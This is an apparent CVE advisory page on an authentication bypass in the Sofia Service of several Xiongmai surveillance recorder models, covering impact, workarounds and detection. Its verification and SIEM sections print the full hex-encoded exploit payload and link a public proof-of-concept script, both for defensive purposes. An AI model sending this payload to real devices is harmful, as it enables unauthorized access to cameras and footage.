CVE-2024-3765
📋 TL;DR
This critical vulnerability in Xiongmai video surveillance devices allows remote attackers to bypass authentication controls via a crafted input to the Sofia Service component. Attackers can gain unauthorized access to device functions without credentials. All listed Xiongmai models with the vulnerable Sofia Service are affected.
💻 Affected Systems
- Xiongmai AHB7804R-MH-V2
- AHB8004T-GL
- AHB8008T-GL
- AHB7004T-GS-V3
- AHB7004T-MHV2
- AHB8032F-LME
- XM530_R80X30-PQ_8M
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete device compromise allowing attackers to disable security systems, manipulate video feeds, access sensitive footage, or use devices as network footholds for lateral movement.
Likely Case
Unauthorized access to surveillance systems enabling privacy violations, footage theft, or disruption of security monitoring.
If Mitigated
No impact if devices are properly segmented behind firewalls with strict network access controls.
🎯 Exploit Status
Public proof-of-concept script available on GitHub. Exploit requires sending specific crafted input to the vulnerable service.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Unknown
Vendor Advisory: None available
Restart Required: No
Instructions:
No official patch available. Consider replacing affected devices with products from responsive vendors.
🔧 Temporary Workarounds
Network Segmentation
allIsolate affected devices from internet and restrict network access to trusted management systems only.
Use firewall rules to block all inbound traffic to affected devices except from authorized management IPs
Service Disablement
linuxDisable the vulnerable Sofia Service if not required for device functionality.
Check device documentation for service management commands
🧯 If You Can't Patch
- Segment devices on isolated VLAN with strict firewall rules blocking all unnecessary traffic
- Monitor network traffic to/from affected devices for exploitation attempts
🔍 How to Verify
Check if Vulnerable:
Test with public PoC script or attempt to send crafted input 'ff00000000000000000000000000f103250000007b202252657422203a203130302c202253657373696f6e494422203a202230783022207d0a' to device Sofia Service portCheck Version:
Check device web interface or console for firmware version informationVerify Fix Applied:
No official fix available to verify. Verify workarounds by testing that exploitation attempts fail.📡 Detection & Monitoring
Log Indicators:
- Unusual authentication bypass attempts
- Unexpected Sofia Service access from unauthorized sources
Network Indicators:
- Traffic containing the specific exploit payload to device Sofia Service ports
- Unauthorized access to device management interfaces
SIEM Query:
Search for network traffic containing 'ff00000000000000000000000000f103250000007b202252657422203a203130302c202253657373696f6e494422203a202230783022207d0a' to port 80/443 or device management ports🔗 References
- https://github.com/netsecfish/xiongmai_incorrect_access_control
- https://github.com/netsecfish/xiongmai_incorrect_access_control/blob/main/pocCheck3-en.py
- https://vuldb.com/?ctiid.260605
- https://vuldb.com/?id.260605
- https://vuldb.com/?submit.311903
- https://github.com/netsecfish/xiongmai_incorrect_access_control
- https://github.com/netsecfish/xiongmai_incorrect_access_control/blob/main/pocCheck3-en.py
- https://vuldb.com/?ctiid.260605
- https://vuldb.com/?id.260605
- https://vuldb.com/?submit.311903
